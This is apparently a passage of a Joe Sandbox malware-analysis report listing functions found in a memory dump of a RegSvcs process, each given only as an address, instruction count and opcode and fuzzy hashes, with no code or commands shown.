                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 03ef6c3e3353a4010227d0d807c4395b0882b1aff0c88f777af014aca7221692
                                            • Instruction ID: dc7e93df3f843a46506b67165ec176eff632e542ef495afd50e0ce0527ba31c0
                                            • Opcode Fuzzy Hash: 03ef6c3e3353a4010227d0d807c4395b0882b1aff0c88f777af014aca7221692
                                            • Instruction Fuzzy Hash: BDB16370A002658BDB65DF58C890BA9B7F5FF44744F0485E9E90AEB241EB709E86CF21
                                            Function 0188E5E7 Relevance: .3, Instructions: 278COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ffdf2ca45fadf4540c1d5a25a63670591d13579a05896b4308bc6458dc698ed3
                                            • Instruction ID: 6fd747d8c338990a2e1991f5864d155b6878427359124543aad990ead92f8c91
                                            • Opcode Fuzzy Hash: ffdf2ca45fadf4540c1d5a25a63670591d13579a05896b4308bc6458dc698ed3
                                            • Instruction Fuzzy Hash: 05A1E731E006599FFB21EB5CC844BADBBA5AF01B18F054115EB11E7291D774DF40CB91
                                            Function 018A0185 Relevance: .3, Instructions: 276COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fc1f954773cbc0259cee1ea1ad8abbe569166eda453068f83eb21c1f9ad08b0c
                                            • Instruction ID: 75e06ba19e576326b14e58cc07be62e00b93aaf7600e5cae08ed2c73adbc0a6c
                                            • Opcode Fuzzy Hash: fc1f954773cbc0259cee1ea1ad8abbe569166eda453068f83eb21c1f9ad08b0c
                                            • Instruction Fuzzy Hash: 9EA1C470B0171A9FEB25DF69D890BAAB7B1FF54318F444029FA45D7281EB34EA11CB50
                                            Function 01934500 Relevance: .3, Instructions: 275COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4b6f34d3b63dc7b13eb851c3fd5607992108d6b5e765ff19fc20d62309656e75
                                            • Instruction ID: 519eaed8ee607b3f2b4b69a33dd16171707734770a2fd27130bb1bf51c72f3a0
                                            • Opcode Fuzzy Hash: 4b6f34d3b63dc7b13eb851c3fd5607992108d6b5e765ff19fc20d62309656e75
                                            • Instruction Fuzzy Hash: 24A1AE72A04612DFD722DF28C980F5ABBE9FF88745F460A28E549DB651D334ED01CB92
                                            Function 01932B57 Relevance: .3, Instructions: 266COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                            • Instruction ID: a7b8d6796f885f665c9c6b3ac8c7d58c8da4372413d72701a02f2086a68f7c75
                                            • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                            • Instruction Fuzzy Hash: 9AB13D71E0061ADFDF29CFADC880AADB7B5FF88311F148169E919AB354D730A941CB91
                                            Function 018E60E0 Relevance: .3, Instructions: 264COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 03f31e5fda969a0d1a49333f4f7ac4a29cfe4b14da053dec36cfa882637b9eed
                                            • Instruction ID: 3655b8f1db50a6a962edf5c21f28a1a66a17cdae5f441a2128c48458a2096417
                                            • Opcode Fuzzy Hash: 03f31e5fda969a0d1a49333f4f7ac4a29cfe4b14da053dec36cfa882637b9eed
                                            • Instruction Fuzzy Hash: 75917371D0021AAFDB15DF68D888BAEBFF5AF5A710F254159E610EB241E734DB009BA0
                                            Function 0187E3F0 Relevance: .3, Instructions: 261COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 19be7a05876e3bae3429e2237513546f853bf834c8f40198571d89e863eb1db2
                                            • Instruction ID: 815ac2a7d3a80f0bb8c5e8eb6ac7c54f72f55b3588a46bfd4514eb22ffc8deb2
                                            • Opcode Fuzzy Hash: 19be7a05876e3bae3429e2237513546f853bf834c8f40198571d89e863eb1db2
                                            • Instruction Fuzzy Hash: 7291F571E0061ACBEB24DB6DC484BBABBA1FF94B18F0541E9ED05EB241E634DB41C752
                                            Function 018B6ACC Relevance: .2, Instructions: 226COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0063dea5a65bec4e857e5f0b207fa3528790c35fd388aa6a4fcaba03b31a546f
                                            • Instruction ID: f910a5f3b054e68d7030591bba6711046c946d5b713280c1f9cf760c6b821e88
                                            • Opcode Fuzzy Hash: 0063dea5a65bec4e857e5f0b207fa3528790c35fd388aa6a4fcaba03b31a546f
                                            • Instruction Fuzzy Hash: A9817271A0061A9BDB24CF69C990AFEBBF9FB48700F14852EE555E7740E334EA40CB94
                                            Function 0192AB40 Relevance: .2, Instructions: 222COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                            • Instruction ID: 583827d9ed3805788d315156ee3d52a0a108c231078c3f15a7514e430e210a1c
                                            • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                            • Instruction Fuzzy Hash: 60818332A002169FDF19CF59C480AAEBBF6FF84311F188569D91A9B789D734EA05CB50
                                            Function 0189E284 Relevance: .2, Instructions: 212COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 62658ec4c512ddbc3a82739751d0b381a354dd4d521cb594ef1f160ba6ca8294
                                            • Instruction ID: 8a7d05b436fc123cb73b3596f0dd41a1888ef47ca8a0ce2ed8d91b030555c7a6
                                            • Opcode Fuzzy Hash: 62658ec4c512ddbc3a82739751d0b381a354dd4d521cb594ef1f160ba6ca8294
                                            • Instruction Fuzzy Hash: ED814F71A00609AFDB25CFA9C880AEEBBBAFF88354F144429E555E7250D730AE45DB60
                                            Function 0187C640 Relevance: .2, Instructions: 206COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7dfaf7fe585dc1336ebc1285ebf0f827851c3c07a0d5a79cbd23dc90034ca647
                                            • Instruction ID: f0d4055ba5db48ffbc6920e7bef0e5244b29906a7576e96dba9ac5250b2bff7c
                                            • Opcode Fuzzy Hash: 7dfaf7fe585dc1336ebc1285ebf0f827851c3c07a0d5a79cbd23dc90034ca647
                                            • Instruction Fuzzy Hash: F571BCB580462ADBCB25CF59D8907BEBBB0FF59B10F14411EE942EB350E7349A00CBA0
                                            Function 019147A0 Relevance: .2, Instructions: 202COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 78adedb0dc756b4f8e493d967f7ad1f85b7b21772799e4c02862750a57d8f4e4
                                            • Instruction ID: 1660d2863c4b8f7c83c77d97ae698783d75d3ba77e36ef31fcb616aca955f151
                                            • Opcode Fuzzy Hash: 78adedb0dc756b4f8e493d967f7ad1f85b7b21772799e4c02862750a57d8f4e4
                                            • Instruction Fuzzy Hash: DC719171904309EFEB20CF99D940A9ABBF9FF98701F55465AE608EB25CC7318980CF54
                                            Function 0187260B Relevance: .2, Instructions: 201COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7cd0c98beef1f8041738b799f6ecc997d27bb437ce0f233d91056d528b06aaf6
                                            • Instruction ID: f50e81fae6aa52408ba7d0c0342b196139831a2161854e8e523bfc6231b048f7
                                            • Opcode Fuzzy Hash: 7cd0c98beef1f8041738b799f6ecc997d27bb437ce0f233d91056d528b06aaf6
                                            • Instruction Fuzzy Hash: EA71C1356042428FD311DF2CC480B2AF7E6FF84714F0485AAE899CB356EB34DA85CB92
                                            Function 018E035C Relevance: .2, Instructions: 198COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                            • Instruction ID: f2bb27e97a0e5acb244eeea31e0b7f5eb8bc4d6a7fb48bcd7b0e92f86dfd39f8
                                            • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                            • Instruction Fuzzy Hash: 63716D71A0060AEFDB10DFA9C984A9EBBF8FF98700F144969E905E7250DB74EA01CB51
                                            Function 018F62A0 Relevance: .2, Instructions: 198COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 598a2b18bb3e121e2495d317c9a4efcdcf6d545f9c1c42b4b433c339cbd79678
                                            • Instruction ID: 6d74be8f1b5b3483632c7ae80a4fb658b3d2c766ad5370a95802c48fe992af99
                                            • Opcode Fuzzy Hash: 598a2b18bb3e121e2495d317c9a4efcdcf6d545f9c1c42b4b433c339cbd79678
                                            • Instruction Fuzzy Hash: B371D132200701AFE7329F18C884F56BBA6EF50724F244A1CE755D76A1E775EA44CB51
                                            Function 01868AA0 Relevance: .2, Instructions: 197COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dd12bbe818f5864ead6eeb75cc44824deabea800f594e1a518ce4b65a698b459
                                            • Instruction ID: 4a5ed0b8dd77c0c712b017d4da307efff3c5bfd02834ac460e609a40015f62e9
                                            • Opcode Fuzzy Hash: dd12bbe818f5864ead6eeb75cc44824deabea800f594e1a518ce4b65a698b459
                                            • Instruction Fuzzy Hash: 8281AB72A083168FDB24CF9CD484BADB7B6BB89714F15412DDA04EB291D774DE81CB90
                                            Function 01938324 Relevance: .2, Instructions: 192COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4b2a4a39e078a364317ef1d10edfe34f85e91d12d86421dfeb6a0c2c501dc35e
                                            • Instruction ID: 9f96026846ec6160b8b0a562c6cbea8574a8c2a7def61a7a2e7fb01fe363229a
                                            • Opcode Fuzzy Hash: 4b2a4a39e078a364317ef1d10edfe34f85e91d12d86421dfeb6a0c2c501dc35e
                                            • Instruction Fuzzy Hash: 84711A71E00209BFEB15DF94CC81FEEBBB9FB44350F104669F625A6290D774AA05CB91
                                            Function 0191A250 Relevance: .2, Instructions: 184COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8e24d39e11745c706a90d6d758c0c4b0559102120f3cf98451877bb1f34fe778
                                            • Instruction ID: e877875796f580b02a04a342eb1e422fa72f3e2cab297557c028a4087bd3913d
                                            • Opcode Fuzzy Hash: 8e24d39e11745c706a90d6d758c0c4b0559102120f3cf98451877bb1f34fe778
                                            • Instruction Fuzzy Hash: 4451F17250674AAFD712DE68C844F5BB7E8EBC5B10F000929BA48DB194D770EE45C7A3
                                            Function 01908350 Relevance: .2, Instructions: 161COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6bd9faae13694a19c98a0a5b90a2374e3a5f34181e846003ec851616058aeae7
                                            • Instruction ID: eb2bd640d4cb619a1bd3c2930d2a75c8e5d7d66097c40147e5d65779bdccdb0f
                                            • Opcode Fuzzy Hash: 6bd9faae13694a19c98a0a5b90a2374e3a5f34181e846003ec851616058aeae7
                                            • Instruction Fuzzy Hash: D9518E70A00B05DFD722DF5AC884A6BFBF8BF94B10F104A1ED29A976E1D770A545CB90
                                            Function 0189E443 Relevance: .2, Instructions: 158COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: db2c8bc5d3da18102e4ee371501b28f373de87b41423a50083452456f933da07
                                            • Instruction ID: e506d2d4cad08ff83b9c61928250e12a7c0933d1d541460cd8bc285165390fcb
                                            • Opcode Fuzzy Hash: db2c8bc5d3da18102e4ee371501b28f373de87b41423a50083452456f933da07
                                            • Instruction Fuzzy Hash: 1D519B31600A05DFDB22EF69C9C0E6AB7F9FF54744F440429E916D7660E734EA40DB52
                                            Function 01904180 Relevance: .2, Instructions: 156COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fededa8f8f4e7bc1ea42e44447886912f29c21b497fa9e15159884e0b9dc4d78
                                            • Instruction ID: d679b3d5ba4e4b531e76561eff196ec4729e6707f08612c411e8d0b46559ad80
                                            • Opcode Fuzzy Hash: fededa8f8f4e7bc1ea42e44447886912f29c21b497fa9e15159884e0b9dc4d78
                                            • Instruction Fuzzy Hash: 3D5158716083029FD755DF29C980A6BB7E9BFC8704F44492DF689C7290E730EA05CB92
                                            Function 018845B1 Relevance: .2, Instructions: 156COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                            • Instruction ID: 3e8062174aac79928a26bd30dbab9ea7ac492e56bb46fac41ed75de862e0854f
                                            • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                            • Instruction Fuzzy Hash: F9516D72E0421EABDF15FF98C440BEEBBB5AF45754F04406AEA01EB240D734DA44CBA1
                                            Function 018EE9E0 Relevance: .2, Instructions: 154COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                            • Instruction ID: 6eedebf00f0cd5c9e4f4d9a00323027bfe8635c109a65d822a1c4110608ff140
                                            • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                            • Instruction Fuzzy Hash: 5351B831D0021EEFEF219E98C888BAEBBF9AB46314F154665D511F7190E7709F4487A1
                                            Function 01928B28 Relevance: .2, Instructions: 152COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 680bfcc4c4358bf60be6e9a67a3fd42f54705b302f2dc63632d1285dc6f85c26
                                            • Instruction ID: 08593a5137d54680a91563c4b94669f52f5bfffa9709f4f214ac2111e7656ca1
                                            • Opcode Fuzzy Hash: 680bfcc4c4358bf60be6e9a67a3fd42f54705b302f2dc63632d1285dc6f85c26
                                            • Instruction Fuzzy Hash: 7D41D371B016219BD729DB2DC894F7BBBDEEF90221F088619F95D87289DB34D801C791
                                            Function 018ECBF0 Relevance: .1, Instructions: 148COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4026fd332f266242291dcc8ee61aefd5d06fbae5146131f9dedb8f6241974e98
                                            • Instruction ID: 1e70724b44c9019d400d383c6f0818a738d0b6a3d176f6ffbacc991af1c56a7a
                                            • Opcode Fuzzy Hash: 4026fd332f266242291dcc8ee61aefd5d06fbae5146131f9dedb8f6241974e98
                                            • Instruction Fuzzy Hash: 37518A72E0021ADFCB20DFADC9849AEBBF9FB4A358B504519E505E3304D732AA01CB91
                                            Function 0189A430 Relevance: .1, Instructions: 139COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7745f0fc2a4683abed03cf240734ad589683668fe7d937d84bebe2366d900307
                                            • Instruction ID: 5a8f4a5e6ec4ffdefa7fbb7555d4cb64532c31466b06578a2e2b61d18f2fac4c
                                            • Opcode Fuzzy Hash: 7745f0fc2a4683abed03cf240734ad589683668fe7d937d84bebe2366d900307
                                            • Instruction Fuzzy Hash: CF410671748306DBEF29EFACA8C0B6A3765EB54758F48002CFD0AEB245E7719A00C752
                                            Function 0192A9D3 Relevance: .1, Instructions: 139COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                            • Instruction ID: cdaca04ca5e85cff1ecda01980e393025bd25a7610460ff2e076455c29d71018
                                            • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                            • Instruction Fuzzy Hash: 1D41FD336007269FD715CF58C984A6AB7AAFF80315B05452EE95A87A44EB30ED08C7D1
                                            Function 018901F8 Relevance: .1, Instructions: 138COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 27ee87acd227f97cc90b50ea10d652b4819116fa7e87c73b6c02cc4f79403860
                                            • Instruction ID: 45220315cb135de9cf352c5ed4f03d1707bebe2ed3f69302f7086f39d66b42d0
                                            • Opcode Fuzzy Hash: 27ee87acd227f97cc90b50ea10d652b4819116fa7e87c73b6c02cc4f79403860
                                            • Instruction Fuzzy Hash: 8F41AF359002199BDF15DF98C440AEEB7B8BF48714F18815AF819F7240D7359E41CBA5
                                            Function 0188EBFC Relevance: .1, Instructions: 138COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: df63df2c3cf53987ca311321d83e4213f00246f24fe2e7cb2855d4e0295466a9
                                            • Instruction ID: 355604ff796f78a58bd788065e93b4c33c08b2e5548054480a86a5a42f2fdfa6
                                            • Opcode Fuzzy Hash: df63df2c3cf53987ca311321d83e4213f00246f24fe2e7cb2855d4e0295466a9
                                            • Instruction Fuzzy Hash: E341B2716143069FE724EF2CC884A1BB7EAFF88318F14482DEA57C7611DB35EA448B52
                                            Function 018A2750 Relevance: .1, Instructions: 137COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                            • Instruction ID: aef0eae84ac88eee7656292a4fa3c01a10abc12d371bc7856870c82808eb6e39
                                            • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                            • Instruction Fuzzy Hash: F6516C75A00219CFCB19CF59C480AAEF7B6FF84724F2881A9D915E7351D770AE82CB90
                                            Function 01866154 Relevance: .1, Instructions: 133COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 06f36d6395a0c3c6f375f3166d5d128974c9f07c31624c2935bd2e64ede2c04c
                                            • Instruction ID: 0c691ad5a005d121e9a450e44e472b8f5c67ccc04fa09d144eec477c1534de11
                                            • Opcode Fuzzy Hash: 06f36d6395a0c3c6f375f3166d5d128974c9f07c31624c2935bd2e64ede2c04c
                                            • Instruction Fuzzy Hash: 8751D670900256DBDB25DB6CCC00BA8BBB9EF15318F2442A9E529E73D1E7349B81CF41
                                            Function 01860BCD Relevance: .1, Instructions: 130COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4b81ff35c6943fc4745c88954137e07f8bcad01b7771f2fb0bda96661ce5b124
                                            • Instruction ID: 74cd7ec5d77bbbcaf32118951c2ff707e9823ff3aff7613f7699481119c55623
                                            • Opcode Fuzzy Hash: 4b81ff35c6943fc4745c88954137e07f8bcad01b7771f2fb0bda96661ce5b124
                                            • Instruction Fuzzy Hash: 33414A31A002299EDB31EF6CC980BEA77B9AF45740F4500A5E948EB241DB749F84CB96
                                            Function 0192866E Relevance: .1, Instructions: 129COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                            • Instruction ID: ea3be33a326cf82d1420aef8948746b25d2bf0828fa38524475aff391a22fc34
                                            • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                            • Instruction Fuzzy Hash: 30419575B10125ABDF15DF99CC84AAFBBFEAF84650F144069E908E7349D670DE01C760
                                            Function 01860887 Relevance: .1, Instructions: 128COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
